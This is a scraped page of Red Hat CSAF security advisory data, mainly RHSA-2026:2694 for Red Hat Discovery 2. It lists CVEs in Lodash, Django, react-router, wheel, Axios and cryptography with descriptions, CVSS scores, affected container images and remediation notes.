"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "flatted: flatted: Unbounded recursion DoS in parse() revive phase"
}
]
}
RHSA-2026:2694
Vulnerability from csaf_redhat - Published: 2026-02-12 22:32 - Updated: 2026-04-16 10:27A flaw was found in Lodash. A prototype pollution vulnerability in the _.unset and _.omit functions allows an attacker able to control property paths to delete methods from global prototypes. By removing essential functionalities, this can result in a denial of service.
A flaw was found in Django. A remote attacker can exploit this vulnerability by sending a crafted request containing multiple duplicate headers to the ASGIRequest component. This can lead to a potential Denial of Service (DoS), making the affected system unavailable to legitimate users.
A flaw was found in Django. A remote attacker could inject SQL commands by manipulating the band index parameter during raster lookups on `RasterField` (only implemented on PostGIS). This SQL injection vulnerability could lead to unauthorized information disclosure, data alteration, or denial of service.
A flaw was found in Django. A remote attacker can exploit this vulnerability by providing crafted inputs containing a large number of unmatched HTML end tags to the `django.utils.text.Truncator.chars()` and `Truncator.words()` methods (when `html=True`), or through the `truncatechars_html` and `truncatewords_html` template filters. This can lead to a denial-of-service (DoS) condition, making the application unavailable to legitimate users.
A flaw was found in Django. This vulnerability allows a remote attacker to perform SQL injection by using specially crafted control characters within column aliases. When these crafted aliases are passed through dictionary expansion to `QuerySet` methods like `annotate()` or `values()`, it can lead to the execution of arbitrary SQL commands. This could result in unauthorized access to sensitive data or modification of information within the database.
A flaw was found in Django. A remote attacker could exploit a SQL injection vulnerability in the `.QuerySet.order_by()` method. This occurs when column aliases containing periods are used, and the same alias is also present in `FilteredRelation` via a specially crafted dictionary. Successful exploitation could lead to unauthorized information disclosure or arbitrary code execution within the database.
A cross site scripting flaw has been discovered in the npm react-router and @remix-run/router packages. React Router (and Remix v1/v2) SPA open navigation redirects originating from loaders or actions in Framework Mode, Data Mode, or the unstable RSC modes can result in unsafe URLs causing unintended javascript execution on the client. This is only an issue if you are creating redirect paths from untrusted content or via an open redirect.
A path traversal flaw has been discovered in the python wheel too. The unpack function is vulnerable to file permission modification through mishandling of file permissions after extraction. The logic blindly trusts the filename from the archive header for the chmod operation, even though the extraction process itself might have sanitized the path. Attackers can craft a malicious wheel file that, when unpacked, changes the permissions of critical system files (e.g., /etc/passwd, SSH keys, config files), allowing for Privilege Escalation or arbitrary code execution by modifying now-writable scripts.
A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.
A validation flaw has been discovered in the python cryptography package. This missing validation allows an attacker to provide a public key point P from a small-order subgroup. This can lead to security issues in various situations, such as the most commonly used signature verification (ECDSA) and shared key negotiation (ECDH). When the victim computes the shared secret as S = [victim_private_key]P via ECDH, this leaks information about victim_private_key mod (small_subgroup_order). For curves with cofactor > 1, this reveals the least significant bits of the private key. When these weak public keys are used in ECDSA , it's easy to forge signatures on the small subgroup. Only SECT curves are impacted by this.
| URL | Category | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "A Subscription Management tool for finding and reporting Red Hat product usage",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat Discovery, also known as Discovery, is an inspection and reporting tool that finds,\nidentifies, and reports environment data, or facts, such as the number of physical and virtual\nsystems on a network, their operating systems, and relevant configuration data stored within\nthem. Discovery also identifies and reports more detailed facts for some versions of key\nRed Hat packages and products that it finds in the network.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:2694",
"url": "https://access.redhat.com/errata/RHSA-2026:2694"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-13465",
"url": "https://access.redhat.com/security/cve/CVE-2025-13465"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-14550",
"url": "https://access.redhat.com/security/cve/CVE-2025-14550"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-1207",
"url": "https://access.redhat.com/security/cve/CVE-2026-1207"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-1285",
"url": "https://access.redhat.com/security/cve/CVE-2026-1285"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-1287",
"url": "https://access.redhat.com/security/cve/CVE-2026-1287"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-1312",
"url": "https://access.redhat.com/security/cve/CVE-2026-1312"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-22029",
"url": "https://access.redhat.com/security/cve/CVE-2026-22029"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-24049",
"url": "https://access.redhat.com/security/cve/CVE-2026-24049"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25639",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-26007",
"url": "https://access.redhat.com/security/cve/CVE-2026-26007"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "external",
"summary": "https://docs.redhat.com/en/documentation/subscription_central/1-latest/#Discovery",
"url": "https://docs.redhat.com/en/documentation/subscription_central/1-latest/#Discovery"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_2694.json"
}
],
"title": "Red Hat Security Advisory: A Subscription Management tool for finding and reporting Red Hat product usage",
"tracking": {
"current_release_date": "2026-04-16T10:27:56+00:00",
"generator": {
"date": "2026-04-16T10:27:56+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.7.5"
}
},
"id": "RHSA-2026:2694",
"initial_release_date": "2026-02-12T22:32:47+00:00",
"revision_history": [
{
"date": "2026-02-12T22:32:47+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-02-12T22:32:54+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-04-16T10:27:56+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Discovery 2",
"product": {
"name": "Red Hat Discovery 2",
"product_id": "Red Hat Discovery 2",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:discovery:2::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat Discovery"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/discovery/discovery-server-rhel9@sha256:f5bc26180f20c635474f48fb7fb1aaf348fb3544db93cc23901ed3fb2662d3a8_amd64",
"product": {
"name": "registry.redhat.io/discovery/discovery-server-rhel9@sha256:f5bc26180f20c635474f48fb7fb1aaf348fb3544db93cc23901ed3fb2662d3a8_amd64",
"product_id": "registry.redhat.io/discovery/discovery-server-rhel9@sha256:f5bc26180f20c635474f48fb7fb1aaf348fb3544db93cc23901ed3fb2662d3a8_amd64",
"product_identification_helper": {
"purl": "pkg:oci/discovery-server-rhel9@sha256%3Af5bc26180f20c635474f48fb7fb1aaf348fb3544db93cc23901ed3fb2662d3a8?arch=amd64\u0026repository_url=registry.redhat.io/discovery\u0026tag=1770913597"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/discovery/discovery-ui-rhel9@sha256:95d6b321323773a5a465ef2e83aafd2937cb4b5fe48bd81c7f8996b3b52702ae_amd64",
"product": {
"name": "registry.redhat.io/discovery/discovery-ui-rhel9@sha256:95d6b321323773a5a465ef2e83aafd2937cb4b5fe48bd81c7f8996b3b52702ae_amd64",
"product_id": "registry.redhat.io/discovery/discovery-ui-rhel9@sha256:95d6b321323773a5a465ef2e83aafd2937cb4b5fe48bd81c7f8996b3b52702ae_amd64",
"product_identification_helper": {
"purl": "pkg:oci/discovery-ui-rhel9@sha256%3A95d6b321323773a5a465ef2e83aafd2937cb4b5fe48bd81c7f8996b3b52702ae?arch=amd64\u0026repository_url=registry.redhat.io/discovery\u0026tag=1770913709"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/discovery/discovery-server-rhel9@sha256:cdf9b1062c961f67ee4f5dd3e23b26420517f884a51d2034efacff6847d47b5f_arm64",
"product": {
"name": "registry.redhat.io/discovery/discovery-server-rhel9@sha256:cdf9b1062c961f67ee4f5dd3e23b26420517f884a51d2034efacff6847d47b5f_arm64",
"product_id": "registry.redhat.io/discovery/discovery-server-rhel9@sha256:cdf9b1062c961f67ee4f5dd3e23b26420517f884a51d2034efacff6847d47b5f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/discovery-server-rhel9@sha256%3Acdf9b1062c961f67ee4f5dd3e23b26420517f884a51d2034efacff6847d47b5f?arch=arm64\u0026repository_url=registry.redhat.io/discovery\u0026tag=1770913597"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/discovery/discovery-ui-rhel9@sha256:2ff9787699ff67dab7ee6f300d84651233f499aac8aeee10bfe21381806393c4_arm64",
"product": {
"name": "registry.redhat.io/discovery/discovery-ui-rhel9@sha256:2ff9787699ff67dab7ee6f300d84651233f499aac8aeee10bfe21381806393c4_arm64",
"product_id": "registry.redhat.io/discovery/discovery-ui-rhel9@sha256:2ff9787699ff67dab7ee6f300d84651233f499aac8aeee10bfe21381806393c4_arm64",
"product_identification_helper": {
"purl": "pkg:oci/discovery-ui-rhel9@sha256%3A2ff9787699ff67dab7ee6f300d84651233f499aac8aeee10bfe21381806393c4?arch=arm64\u0026repository_url=registry.redhat.io/discovery\u0026tag=1770913709"
}
}
}
],
"category": "architecture",
"name": "arm64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/discovery/discovery-server-rhel9@sha256:cdf9b1062c961f67ee4f5dd3e23b26420517f884a51d2034efacff6847d47b5f_arm64 as a component of Red Hat Discovery 2",
"product_id": "Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:cdf9b1062c961f67ee4f5dd3e23b26420517f884a51d2034efacff6847d47b5f_arm64"
},
"product_reference": "registry.redhat.io/discovery/discovery-server-rhel9@sha256:cdf9b1062c961f67ee4f5dd3e23b26420517f884a51d2034efacff6847d47b5f_arm64",
"relates_to_product_reference": "Red Hat Discovery 2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/discovery/discovery-server-rhel9@sha256:f5bc26180f20c635474f48fb7fb1aaf348fb3544db93cc23901ed3fb2662d3a8_amd64 as a component of Red Hat Discovery 2",
"product_id": "Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:f5bc26180f20c635474f48fb7fb1aaf348fb3544db93cc23901ed3fb2662d3a8_amd64"
},
"product_reference": "registry.redhat.io/discovery/discovery-server-rhel9@sha256:f5bc26180f20c635474f48fb7fb1aaf348fb3544db93cc23901ed3fb2662d3a8_amd64",
"relates_to_product_reference": "Red Hat Discovery 2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/discovery/discovery-ui-rhel9@sha256:2ff9787699ff67dab7ee6f300d84651233f499aac8aeee10bfe21381806393c4_arm64 as a component of Red Hat Discovery 2",
"product_id": "Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:2ff9787699ff67dab7ee6f300d84651233f499aac8aeee10bfe21381806393c4_arm64"
},
"product_reference": "registry.redhat.io/discovery/discovery-ui-rhel9@sha256:2ff9787699ff67dab7ee6f300d84651233f499aac8aeee10bfe21381806393c4_arm64",
"relates_to_product_reference": "Red Hat Discovery 2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/discovery/discovery-ui-rhel9@sha256:95d6b321323773a5a465ef2e83aafd2937cb4b5fe48bd81c7f8996b3b52702ae_amd64 as a component of Red Hat Discovery 2",
"product_id": "Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:95d6b321323773a5a465ef2e83aafd2937cb4b5fe48bd81c7f8996b3b52702ae_amd64"
},
"product_reference": "registry.redhat.io/discovery/discovery-ui-rhel9@sha256:95d6b321323773a5a465ef2e83aafd2937cb4b5fe48bd81c7f8996b3b52702ae_amd64",
"relates_to_product_reference": "Red Hat Discovery 2"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-13465",
"cwe": {
"id": "CWE-1321",
"name": "Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027)"
},
"discovery_date": "2026-01-21T20:01:28.774829+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:cdf9b1062c961f67ee4f5dd3e23b26420517f884a51d2034efacff6847d47b5f_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:f5bc26180f20c635474f48fb7fb1aaf348fb3544db93cc23901ed3fb2662d3a8_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2431740"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Lodash. A prototype pollution vulnerability in the _.unset and _.omit functions allows an attacker able to control property paths to delete methods from global prototypes. By removing essential functionalities, this can result in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "lodash: prototype pollution in _.unset and _.omit functions",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This issue is only exploitable by applications using the _.unset and _.omit functions on an object and allowing user input to determine the path of the property to be removed. This issue only allows the deletion of properties but does not allow overwriting their behavior, limiting the impact to a denial of service. Due to this reason, this vulnerability has been rated with an important severity.\n\nIn Grafana, JavaScript code runs only in the browser, while the server side is all Golang. Therefore, the worst-case scenario is a loss of functionality in the client application inside the browser. To reflect this, the CVSS availability metric and the severity of the Grafana and the Grafana-PCP component have been updated to low and moderate, respectively.\n\nThe lodash dependency is bundled and used by the pcs-web-ui component of the PCS package. In Red Hat Enterprise Linux 8.10, the pcs-web-ui component is no longer included in the PCS package. As a result, RHEL 8.10 does not ship the vulnerable lodash component within PCS and is therefore not-affected by this CVE.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:2ff9787699ff67dab7ee6f300d84651233f499aac8aeee10bfe21381806393c4_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:95d6b321323773a5a465ef2e83aafd2937cb4b5fe48bd81c7f8996b3b52702ae_amd64"
],
"known_not_affected": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:cdf9b1062c961f67ee4f5dd3e23b26420517f884a51d2034efacff6847d47b5f_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:f5bc26180f20c635474f48fb7fb1aaf348fb3544db93cc23901ed3fb2662d3a8_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-13465"
},
{
"category": "external",
"summary": "RHBZ#2431740",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431740"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-13465",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-13465"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-13465",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13465"
},
{
"category": "external",
"summary": "https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg",
"url": "https://github.com/lodash/lodash/security/advisories/GHSA-xxjr-mmjv-4gpg"
}
],
"release_date": "2026-01-21T19:05:28.846000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-02-12T22:32:47+00:00",
"details": "The containers required to run Discovery can be installed through discovery-installer\nRPM. See the official documentation for more details.",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:2ff9787699ff67dab7ee6f300d84651233f499aac8aeee10bfe21381806393c4_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:95d6b321323773a5a465ef2e83aafd2937cb4b5fe48bd81c7f8996b3b52702ae_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:2694"
},
{
"category": "workaround",
"details": "To mitigate this issue, implement strict input validation before passing any property paths to the _.unset and _.omit functions to block attempts to access the prototype chain. Ensure that strings like __proto__, constructor and prototype are blocked, for example.",
"product_ids": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:cdf9b1062c961f67ee4f5dd3e23b26420517f884a51d2034efacff6847d47b5f_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:f5bc26180f20c635474f48fb7fb1aaf348fb3544db93cc23901ed3fb2662d3a8_amd64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:2ff9787699ff67dab7ee6f300d84651233f499aac8aeee10bfe21381806393c4_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-ui-rhel9@sha256:95d6b321323773a5a465ef2e83aafd2937cb4b5fe48bd81c7f8996b3b52702ae_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:cdf9b1062c961f67ee4f5dd3e23b26420517f884a51d2034efacff6847d47b5f_arm64",
"Red Hat Discovery 2:registry.redhat.io/discovery/discovery-server-rhel9@sha256:f5bc26180f20c635474f48fb7fb1aaf348fb3544db93cc23901ed3fb2662d3a8_amd64",
